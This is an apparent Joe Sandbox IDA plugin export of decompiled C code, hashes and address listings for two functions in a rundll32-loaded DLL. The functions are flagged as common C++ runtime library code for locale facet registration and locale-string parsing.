                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: pm,n
                          • API String ID: 651022567-2572091394
                          • Opcode ID: 8a30b9bb76ec5eaa5a37e6aec8e79c23ec760855f3273b040763a584d205b40d
                          • Instruction ID: 4d7e936a3ed2f7f129a1bd50156fb673837000677847a2d41008beb10c35c4f9
                          • Opcode Fuzzy Hash: 8a30b9bb76ec5eaa5a37e6aec8e79c23ec760855f3273b040763a584d205b40d
                          • Instruction Fuzzy Hash: 1811E37590051E8FCF00DBE0C894AEEB77BAF84718F240909E510AB2D0DFB49A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E204A80, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E6E204A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t57;
				intOrPtr* _t60;
				void* _t61;

				_t44 = __ebx;
				E6E2200AC(0x6e268144, __ebx, __edi, __esi, 0x14);
				E6E206653(_t61 - 0x14, 0);
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				_t57 =  *0x6e2dce80; // 0x2bf23c0
				 *((intOrPtr*)(_t61 - 0x10)) = _t57;
				_t23 = E6E1E161C(0x6e2c6b34);
				_t47 =  *((intOrPtr*)(_t61 + 8));
				_t24 = E6E1E171B( *((intOrPtr*)(_t61 + 8)), _t23);
				_t59 = _t24;
				if(_t24 != 0) {
					L5:
					E6E2066BA(_t61 - 0x14);
					return E6E220075(_t59);
				} else {
					if(_t57 == 0) {
						_push( *((intOrPtr*)(_t61 + 8)));
						_push(_t61 - 0x10);
						__eflags = E6E1E18A0(__ebx, _t47, __edx, _t57, _t59) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t61 - 0x20);
							E6E223D74(_t61 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e268192, __ebx, _t57, _t59, 0xc);
							_t60 = E6E204A32(_t44, _t57, _t59, 8);
							 *((intOrPtr*)(_t61 - 0x18)) = _t61 - 0xd;
							 *((intOrPtr*)(_t61 - 0x14)) = _t60;
							__eflags = 0;
							 *(_t61 - 4) = 0;
							 *_t60 = 0;
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *_t60 = E6E205BFB();
							return E6E220075(_t60);
						} else {
							_t59 =  *((intOrPtr*)(_t61 - 0x10));
							 *((intOrPtr*)(_t61 - 0x10)) = _t59;
							 *(_t61 - 4) = 1;
							E6E206FD3(__eflags, _t59);
							 *((intOrPtr*)( *_t59 + 4))();
							 *0x6e2dce80 = _t59;
							goto L5;
						}
					} else {
						_t59 = _t57;
						goto L5;
					}
				}
			}








                          0x6e204a80
                          0x6e204a87
                          0x6e204a91
                          0x6e204a96
                          0x6e204a9f
                          0x6e204aa5
                          0x6e204aa8
                          0x6e204aad
                          0x6e204ab1
                          0x6e204ab6
                          0x6e204aba
                          0x6e204af5
                          0x6e204af8
                          0x6e204b04
                          0x6e204abc
                          0x6e204abe
                          0x6e204ac4
                          0x6e204aca
                          0x6e204ad2
                          0x6e204ad5
                          0x6e204b08
                          0x6e204b16
                          0x6e204b1b
                          0x6e204b23
                          0x6e204b2f
                          0x6e204b35
                          0x6e204b38
                          0x6e204b3b
                          0x6e204b3d
                          0x6e204b40
                          0x6e204b42
                          0x6e204b4a
                          0x6e204b53
                          0x6e204ad7
                          0x6e204ad7
                          0x6e204ada
                          0x6e204ade
                          0x6e204ae2
                          0x6e204aec
                          0x6e204aef
                          0x00000000
                          0x6e204aef
                          0x6e204ac0
                          0x6e204ac0
                          0x00000000
                          0x6e204ac0
                          0x6e204abe

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E204A87
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E204A91
                          • int.LIBCPMT ref: 6E204AA8
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E204AE2
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E204AF8
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E204B16
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: 4k,n
                          • API String ID: 651022567-2310321114
                          • Opcode ID: fd993dd31e729741fb0ed1f16ed0c38dafbb1994221349c2cae0aa3e911a7adf
                          • Instruction ID: 00ec10d4d1f6f95a13ce8117a06ad8c9da69bf17027057e75645471f1ee739ee
                          • Opcode Fuzzy Hash: fd993dd31e729741fb0ed1f16ed0c38dafbb1994221349c2cae0aa3e911a7adf
                          • Instruction Fuzzy Hash: 0011E176E0052E9BCF00DBE0C894AEDB77BBF54715F144A18E510AB2D0DBB49A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24E506, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 76%
                          			E6E24E506(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t243;
				void* _t246;
				signed int _t249;
				signed int _t251;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t275;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t288;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t331;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr _t337;
				signed int _t342;
				signed int _t343;
				intOrPtr* _t346;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t367;
				signed int _t373;
				intOrPtr* _t377;
				intOrPtr* _t380;
				void* _t383;
				signed int _t384;
				intOrPtr* _t385;
				signed int _t398;
				signed int _t401;
				intOrPtr* _t402;
				signed int _t404;
				signed int* _t408;
				intOrPtr* _t415;
				intOrPtr* _t416;
				intOrPtr _t425;
				signed int _t426;
				short _t427;
				signed int _t430;
				intOrPtr _t431;
				signed int _t434;
				intOrPtr _t435;
				signed int _t437;
				signed int _t440;
				intOrPtr _t446;
				signed int _t447;
				void* _t448;
				signed int _t449;
				signed int _t450;
				signed int _t453;
				signed int _t455;
				void* _t456;
				signed int _t459;
				signed int* _t460;
				intOrPtr* _t461;
				short _t462;
				void* _t464;
				signed int _t466;
				signed int _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t477;
				signed int _t478;
				void* _t480;
				void* _t482;
				intOrPtr _t494;

				_t425 = __edx;
				_t464 = _t470;
				_t471 = _t470 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t360 = E6E24F26D(__ecx, 0x6a6);
				_t242 = 0;
				_pop(_t373);
				if(_t360 == 0) {
					L20:
					return _t242;
				} else {
					_push(__edi);
					_t2 = _t360 + 4; // 0x4
					_t430 = _t2;
					 *_t430 = 0;
					 *_t360 = 1;
					_t446 = _a4;
					_t4 = _t446 + 0x30; // 0x6e24da4e
					_t243 = _t4;
					_push( *_t243);
					_v16 = _t243;
					_push(0x6e270f34);
					_push( *0x6e270dec);
					E6E24E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
					_t473 = _t471 + 0x18;
					_v8 = 0x6e270dec;
					while(1) {
						L2:
						_t246 = E6E25D470(_t430, 0x351, 0x6e270f30);
						_t474 = _t473 + 0xc;
						if(_t246 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t342 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							goto L4;
						}
						while(1) {
							L4:
							_t425 =  *_t342;
							if(_t425 !=  *_t416) {
								break;
							}
							if(_t425 == 0) {
								L8:
								_t343 = 0;
							} else {
								_t425 =  *((intOrPtr*)(_t342 + 2));
								if(_t425 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t342 = _t342 + 4;
									_t416 = _t416 + 4;
									if(_t425 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t373 = _v8 + 0xc;
							_v8 = _t373;
							_v12 = _v12 &  !( ~_t343);
							_t346 = _v16;
							_v16 = _t346;
							_push( *_t346);
							_push(0x6e270f34);
							_push( *_t373);
							E6E24E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
							_t473 = _t474 + 0x18;
							if(_v8 < 0x6e270e1c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6E24CBD3(_t360);
									_t31 = _t446 + 0x28; // 0x10468b00
									_t437 = _t430 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t446 + 0x28; // 0x10468b00
											E6E24CBD3( *_t32);
										}
									}
									_t33 = _t446 + 0x24; // 0x3b8e8
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t437 == 1;
										if(_t437 == 1) {
											_t34 = _t446 + 0x24; // 0x3b8e8
											E6E24CBD3( *_t34);
										}
									}
									 *(_t446 + 0x24) = 0;
									 *(_t446 + 0x1c) = 0;
									 *(_t446 + 0x28) = 0;
									 *((intOrPtr*)(_t446 + 0x20)) = 0;
									_t39 = _t446 + 0x40; // 0x18914c4
									_t242 =  *_t39;
								} else {
									_t20 = _t446 + 0x28; // 0x10468b00
									_t440 = _t430 | 0xffffffff;
									_t494 =  *_t20;
									if(_t494 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t494 == 0) {
											_t21 = _t446 + 0x28; // 0x10468b00
											E6E24CBD3( *_t21);
										}
									}
									_t22 = _t446 + 0x24; // 0x3b8e8
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t440 == 1) {
											_t23 = _t446 + 0x24; // 0x3b8e8
											E6E24CBD3( *_t23);
										}
									}
									 *(_t446 + 0x24) =  *(_t446 + 0x24) & 0x00000000;
									_t26 = _t360 + 4; // 0x4
									_t242 = _t26;
									 *(_t446 + 0x1c) =  *(_t446 + 0x1c) & 0x00000000;
									 *(_t446 + 0x28) = _t360;
									 *((intOrPtr*)(_t446 + 0x20)) = _t242;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t343 = _t342 | 0x00000001;
						__eflags = _t343;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E242188();
					asm("int3");
					_push(_t464);
					_t466 = _t474;
					_t475 = _t474 - 0x1d0;
					_t249 =  *0x6e2c506c; // 0x8e829fa6
					_v56 = _t249 ^ _t466;
					_t251 = _v40;
					_push(_t360);
					_push(_t446);
					_t447 = _v36;
					_push(_t430);
					_t431 = _v44;
					_v508 = _t431;
					__eflags = _t251;
					if(_t251 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t362 = 0;
						_v452 = 0;
						__eflags = _t447;
						if(__eflags == 0) {
							L80:
							E6E24E506(_t362, _t373, _t425, _t431, _t447, __eflags, _t431);
							goto L81;
						} else {
							__eflags =  *_t447 - 0x4c;
							if( *_t447 != 0x4c) {
								L59:
								_t257 = E6E24DE92(_t362, _t425, _t431, _t447, _t447,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t477 = _t475 + 0x18;
								__eflags = _t257;
								if(_t257 != 0) {
									_t373 = 0;
									__eflags = 0;
									_t76 = _t431 + 0x20; // 0x6e24da3e
									_t426 = _t76;
									_t449 = 0;
									_v452 = _t426;
									do {
										__eflags = _t449;
										if(_t449 == 0) {
											L74:
											_t258 = _v456;
										} else {
											_t377 =  *_t426;
											_t259 =  &_v276;
											while(1) {
												__eflags =  *_t259 -  *_t377;
												_t431 = _v464;
												if( *_t259 !=  *_t377) {
													break;
												}
												__eflags =  *_t259;
												if( *_t259 == 0) {
													L67:
													_t373 = 0;
													_t260 = 0;
												} else {
													_t427 =  *((intOrPtr*)(_t259 + 2));
													__eflags = _t427 -  *((intOrPtr*)(_t377 + 2));
													_v458 = _t427;
													_t426 = _v452;
													if(_t427 !=  *((intOrPtr*)(_t377 + 2))) {
														break;
													} else {
														_t259 = _t259 + 4;
														_t377 = _t377 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t260;
												if(_t260 == 0) {
													_t362 = _t362 + 1;
													__eflags = _t362;
													goto L74;
												} else {
													_t261 =  &_v276;
													_push(_t261);
													_push(_t449);
													_push(_t431);
													L84();
													_t426 = _v452;
													_t477 = _t477 + 0xc;
													__eflags = _t261;
													if(_t261 == 0) {
														_t373 = 0;
														_t258 = 0;
														_v456 = 0;
													} else {
														_t362 = _t362 + 1;
														_t373 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t260 = _t259 | 0x00000001;
											_t373 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t449 = _t449 + 1;
										_t426 = _t426 + 0x10;
										_v452 = _t426;
										__eflags = _t449 - 5;
									} while (_t449 <= 5);
									__eflags = _t258;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t362;
										goto L78;
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t447 + 2) - 0x43;
								if( *(_t447 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t447 + 4)) - 0x5f;
									if( *((short*)(_t447 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t263 = E6E25D60D(_t447, 0x6e270f28);
											_t364 = _t263;
											_v472 = _t364;
											_pop(_t379);
											__eflags = _t364;
											if(_t364 == 0) {
												break;
											}
											_t265 = _t263 - _t447;
											__eflags = _t265;
											_v456 = _t265 >> 1;
											if(_t265 == 0) {
												break;
											} else {
												_t267 = 0x3b;
												__eflags =  *_t364 - _t267;
												if( *_t364 == _t267) {
													break;
												} else {
													_t434 = _v456;
													_t365 = 0x6e270dec;
													_v460 = 1;
													do {
														_t268 = E6E24ABBA( *_t365, _t447, _t434);
														_t475 = _t475 + 0xc;
														__eflags = _t268;
														if(_t268 != 0) {
															goto L46;
														} else {
															_t380 =  *_t365;
															_t425 = _t380 + 2;
															do {
																_t337 =  *_t380;
																_t380 = _t380 + 2;
																__eflags = _t337 - _v468;
															} while (_t337 != _v468);
															_t379 = _t380 - _t425 >> 1;
															__eflags = _t434 - _t380 - _t425 >> 1;
															if(_t434 != _t380 - _t425 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v460 = _v460 + 1;
														_t365 = _t365 + 0xc;
														__eflags = _t365 - 0x6e270e1c;
													} while (_t365 <= 0x6e270e1c);
													_t362 = _v472 + 2;
													_t269 = E6E25D5BD(_t379, _t362, 0x6e270f30);
													_t431 = _v464;
													_t450 = _t269;
													_pop(_t383);
													__eflags = _t450;
													if(_t450 != 0) {
														L49:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t270 = _v452;
															goto L55;
														} else {
															_push(_t450);
															_t272 = E6E25D5B2(_t383,  &_v276, 0x83, _t362);
															_t478 = _t475 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6E242188();
																asm("int3");
																_push(_t466);
																_t468 = _t478;
																_t275 =  *0x6e2c506c; // 0x8e829fa6
																_v556 = _t275 ^ _t468;
																_push(_t362);
																_t367 = _v540;
																_push(_t450);
																_push(_t431);
																_t435 = _v544;
																_v1292 = _t367;
																_v1276 = E6E24D5FF(_t367, _t383, _t425) + 0x278;
																_t282 = E6E24DE92(_t367, _t425, _t435, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55,  &_v1256);
																_t480 = _t478 - 0x2e4 + 0x18;
																__eflags = _t282;
																if(_t282 != 0) {
																	_t101 = _t367 + 2; // 0x6
																	_t453 = _t101 << 4;
																	__eflags = _t453;
																	_t283 =  &_v280;
																	_v724 = _t453;
																	_t428 =  *(_t453 + _t435);
																	_t384 =  *(_t453 + _t435);
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t283 -  *_t384;
																		_t455 = _v724;
																		if( *_t283 !=  *_t384) {
																			break;
																		}
																		__eflags =  *_t283;
																		if( *_t283 == 0) {
																			L93:
																			_t284 = _v712;
																		} else {
																			_t462 =  *((intOrPtr*)(_t283 + 2));
																			__eflags = _t462 -  *((intOrPtr*)(_t384 + 2));
																			_v718 = _t462;
																			_t455 = _v724;
																			if(_t462 !=  *((intOrPtr*)(_t384 + 2))) {
																				break;
																			} else {
																				_t283 = _t283 + 4;
																				_t384 = _t384 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L93;
																				}
																			}
																		}
																		L95:
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t385 =  &_v280;
																			_t428 = _t385 + 2;
																			do {
																				_t285 =  *_t385;
																				_t385 = _t385 + 2;
																				__eflags = _t285 - _v712;
																			} while (_t285 != _v712);
																			_v728 = (_t385 - _t428 >> 1) + 1;
																			_t288 = E6E24F26D(_t385 - _t428 >> 1, 4 + ((_t385 - _t428 >> 1) + 1) * 2);
																			_v740 = _t288;
																			__eflags = _t288;
																			if(_t288 == 0) {
																				goto L86;
																			} else {
																				_v732 =  *((intOrPtr*)(_t455 + _t435));
																				_t125 = _t367 * 4; // 0xe764e850
																				_v744 =  *((intOrPtr*)(_t435 + _t125 + 0xa0));
																				_t128 = _t435 + 8; // 0x8b018b
																				_v748 =  *_t128;
																				_t394 =  &_v280;
																				_v720 = _t288 + 4;
																				_t292 = E6E2491A7(_t288 + 4, _v728,  &_v280);
																				_t482 = _t480 + 0xc;
																				__eflags = _t292;
																				if(_t292 != 0) {
																					_t293 = _v712;
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					E6E242188();
																					asm("int3");
																					_t295 =  *0x6e2c76f0; // 0x2c047d8
																					 *0x6e2c5108 =  *((intOrPtr*)(_t295 + 0x88));
																					 *0x6e2c51c0 =  *_t295;
																					_t296 =  *((intOrPtr*)(_t295 + 4));
																					 *0x6e2c51ec = _t296;
																					return _t296;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t435)) = _v720;
																					if(_v280 != 0x43) {
																						L104:
																						_t299 = E6E24DB3B(_t367, _t394, _t435,  &_v708);
																						_t398 = _v712;
																						 *(_t435 + 0xa0 + _t367 * 4) = _t299;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L104;
																						} else {
																							_t398 = _v712;
																							 *(_t435 + 0xa0 + _t367 * 4) = _t398;
																						}
																					}
																					__eflags = _t367 - 2;
																					if(_t367 != 2) {
																						__eflags = _t367 - 1;
																						if(_t367 != 1) {
																							__eflags = _t367 - 5;
																							if(_t367 == 5) {
																								 *((intOrPtr*)(_t435 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t435 + 0x10)) = _v716;
																						}
																					} else {
																						_t460 = _v736;
																						_t428 = _t398;
																						_t408 = _t460;
																						 *(_t435 + 8) = _v716;
																						_v720 = _t460;
																						_v728 = _t460[8];
																						_v716 = _t460[9];
																						while(1) {
																							_t154 = _t435 + 8; // 0x8b018b
																							__eflags =  *_t154 -  *_t408;
																							if( *_t154 ==  *_t408) {
																								break;
																							}
																							_t461 = _v720;
																							_t428 = _t428 + 1;
																							_t331 =  *_t408;
																							 *_t461 = _v728;
																							_v716 = _t408[1];
																							_t408 = _t461 + 8;
																							 *((intOrPtr*)(_t461 + 4)) = _v716;
																							_t367 = _v752;
																							_t460 = _v736;
																							_v728 = _t331;
																							_v720 = _t408;
																							__eflags = _t428 - 5;
																							if(_t428 < 5) {
																								continue;
																							} else {
																							}
																							L112:
																							__eflags = _t428 - 5;
																							if(__eflags == 0) {
																								_t178 = _t435 + 8; // 0x8b018b
																								_t322 = E6E256102(_t367, _t428, _t435, __eflags, _v712, 1, 0x6e270ea8, 0x7f,  &_v536,  *_t178, 1);
																								_t482 = _t482 + 0x1c;
																								__eflags = _t322;
																								_t323 = _v712;
																								if(_t322 == 0) {
																									_t460[1] = _t323;
																								} else {
																									do {
																										 *(_t468 + _t323 * 2 - 0x20c) =  *(_t468 + _t323 * 2 - 0x20c) & 0x000001ff;
																										_t323 = _t323 + 1;
																										__eflags = _t323 - 0x7f;
																									} while (_t323 < 0x7f);
																									_t326 = E6E221C3C( &_v536,  *0x6e2c51e8, 0xfe);
																									_t482 = _t482 + 0xc;
																									__eflags = _t326;
																									_t460[1] = 0 | _t326 == 0x00000000;
																								}
																								_t193 = _t435 + 8; // 0x8b018b
																								 *_t460 =  *_t193;
																							}
																							 *(_t435 + 0x18) = _t460[1];
																							goto L123;
																						}
																						__eflags = _t428;
																						if(_t428 != 0) {
																							 *_t460 =  *(_t460 + _t428 * 8);
																							_t460[1] =  *(_t460 + 4 + _t428 * 8);
																							 *(_t460 + _t428 * 8) = _v728;
																							 *(_t460 + 4 + _t428 * 8) = _v716;
																						}
																						goto L112;
																					}
																					L123:
																					_t300 = _t367 * 0xc;
																					_t200 = _t300 + 0x6e270de8; // 0x6e20815c
																					 *0x6e26a26c(_t435);
																					_t302 =  *((intOrPtr*)( *_t200))();
																					_t401 = _v732;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						__eflags = _t401 - 0x6e2c52b0;
																						if(_t401 != 0x6e2c52b0) {
																							_t459 = _t367 + _t367;
																							__eflags = _t459;
																							asm("lock xadd [eax], ecx");
																							if(_t459 != 0) {
																								goto L128;
																							} else {
																								_t218 = _t459 * 8; // 0x10468b00
																								E6E24CBD3( *((intOrPtr*)(_t435 + _t218 + 0x28)));
																								_t221 = _t459 * 8; // 0x3b8e8
																								E6E24CBD3( *((intOrPtr*)(_t435 + _t221 + 0x24)));
																								_t224 = _t367 * 4; // 0xe764e850
																								E6E24CBD3( *((intOrPtr*)(_t435 + _t224 + 0xa0)));
																								_t404 = _v712;
																								 *((intOrPtr*)(_v724 + _t435)) = _t404;
																								 *(_t435 + 0xa0 + _t367 * 4) = _t404;
																							}
																						}
																						_t402 = _v740;
																						 *_t402 = 1;
																						 *((intOrPtr*)(_t435 + 0x28 + (_t367 + _t367) * 8)) = _t402;
																					} else {
																						 *(_v724 + _t435) = _t401;
																						_t205 = _t367 * 4; // 0xe764e850
																						E6E24CBD3( *((intOrPtr*)(_t435 + _t205 + 0xa0)));
																						 *(_t435 + 0xa0 + _t367 * 4) = _v744;
																						E6E24CBD3(_v740);
																						 *(_t435 + 8) = _v748;
																						goto L86;
																					}
																					goto L87;
																				}
																			}
																		} else {
																			goto L87;
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t284 = _t283 | 0x00000001;
																	__eflags = _t284;
																	goto L95;
																} else {
																	L86:
																	__eflags = 0;
																	L87:
																	_pop(_t456);
																	__eflags = _v16 ^ _t468;
																	return E6E21F8A5(_v16 ^ _t468, _t428, _t456);
																}
															} else {
																_t333 = _t450 + _t450;
																__eflags = _t333 - 0x106;
																if(_t333 >= 0x106) {
																	E6E2203A9();
																	goto L83;
																} else {
																	 *((short*)(_t466 + _t333 - 0x10c)) = 0;
																	_t335 =  &_v276;
																	_push(_t335);
																	_push(_v460);
																	_push(_t431);
																	L84();
																	_t475 = _t478 + 0xc;
																	__eflags = _t335;
																	_t270 = _v452;
																	if(_t335 != 0) {
																		_t270 = _t270 + 1;
																		_v452 = _t270;
																	}
																	L55:
																	_t447 = _t362 + _t450 * 2;
																	_t373 = 0;
																	__eflags =  *_t447;
																	if( *_t447 == 0) {
																		L57:
																		__eflags = _t270;
																		L78:
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																		}
																		goto L81;
																	} else {
																		_t447 = _t447 + 2;
																		__eflags =  *_t447;
																		if( *_t447 != 0) {
																			continue;
																		} else {
																			goto L57;
																		}
																	}
																}
															}
														}
													} else {
														_t336 = 0x3b;
														__eflags =  *_t362 - _t336;
														if( *_t362 != _t336) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L131;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t447;
						if(_t447 != 0) {
							_push(_t447);
							_push(_t251);
							_push(_t431);
							L84();
						}
						L81:
						_pop(_t448);
						__eflags = _v12 ^ _t466;
						return E6E21F8A5(_v12 ^ _t466, _t425, _t448);
					}
				}
				L131:
			}








































































































































                          0x6e24e506
                          0x6e24e509
                          0x6e24e50b
                          0x6e24e50e
                          0x6e24e50f
                          0x6e24e518
                          0x6e24e520
                          0x6e24e522
                          0x6e24e524
                          0x6e24e527
                          0x6e24e640
                          0x6e24e645
                          0x6e24e52d
                          0x6e24e52d
                          0x6e24e52e
                          0x6e24e52e
                          0x6e24e531
                          0x6e24e534
                          0x6e24e536
                          0x6e24e539
                          0x6e24e539
                          0x6e24e53c
                          0x6e24e53e
                          0x6e24e541
                          0x6e24e546
                          0x6e24e554
                          0x6e24e55e
                          0x6e24e561
                          0x6e24e564
                          0x6e24e564
                          0x6e24e56f
                          0x6e24e574
                          0x6e24e579
                          0x00000000
                          0x6e24e57f
                          0x6e24e582
                          0x6e24e582
                          0x6e24e585
                          0x6e24e587
                          0x6e24e58a
                          0x6e24e58a
                          0x6e24e58a
                          0x6e24e58c
                          0x6e24e58c
                          0x6e24e58c
                          0x6e24e592
                          0x00000000
                          0x00000000
                          0x6e24e597
                          0x6e24e5ae
                          0x6e24e5ae
                          0x6e24e599
                          0x6e24e599
                          0x6e24e5a1
                          0x00000000
                          0x6e24e5a3
                          0x6e24e5a3
                          0x6e24e5a6
                          0x6e24e5ac
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24e5ac
                          0x6e24e5a1
                          0x6e24e5b7
                          0x6e24e5bc
                          0x6e24e5be
                          0x6e24e5c3
                          0x6e24e5c6
                          0x6e24e5c9
                          0x6e24e5cc
                          0x6e24e5cf
                          0x6e24e5d1
                          0x6e24e5d6
                          0x6e24e5e0
                          0x6e24e5e8
                          0x6e24e5f0
                          0x00000000
                          0x6e24e5f6
                          0x6e24e5fa
                          0x6e24e647
                          0x6e24e64d
                          0x6e24e650
                          0x6e24e653
                          0x6e24e655
                          0x6e24e659
                          0x6e24e65d
                          0x6e24e65f
                          0x6e24e662
                          0x6e24e667
                          0x6e24e65d
                          0x6e24e668
                          0x6e24e66b
                          0x6e24e66d
                          0x6e24e66f
                          0x6e24e673
                          0x6e24e674
                          0x6e24e676
                          0x6e24e679
                          0x6e24e67e
                          0x6e24e674
                          0x6e24e681
                          0x6e24e684
                          0x6e24e687
                          0x6e24e68a
                          0x6e24e68d
                          0x6e24e68d
                          0x6e24e5fc
                          0x6e24e5fc
                          0x6e24e5ff
                          0x6e24e602
                          0x6e24e604
                          0x6e24e608
                          0x6e24e60c
                          0x6e24e60e
                          0x6e24e611
                          0x6e24e616
                          0x6e24e60c
                          0x6e24e617
                          0x6e24e61c
                          0x6e24e61e
                          0x6e24e623
                          0x6e24e625
                          0x6e24e628
                          0x6e24e62d
                          0x6e24e623
                          0x6e24e62e
                          0x6e24e632
                          0x6e24e632
                          0x6e24e635
                          0x6e24e639
                          0x6e24e63c
                          0x6e24e63c
                          0x00000000
                          0x6e24e63f
                          0x00000000
                          0x6e24e5f0
                          0x6e24e5b2
                          0x6e24e5b4
                          0x6e24e5b4
                          0x00000000
                          0x6e24e5b4
                          0x6e24e694
                          0x6e24e695
                          0x6e24e696
                          0x6e24e697
                          0x6e24e698
                          0x6e24e699
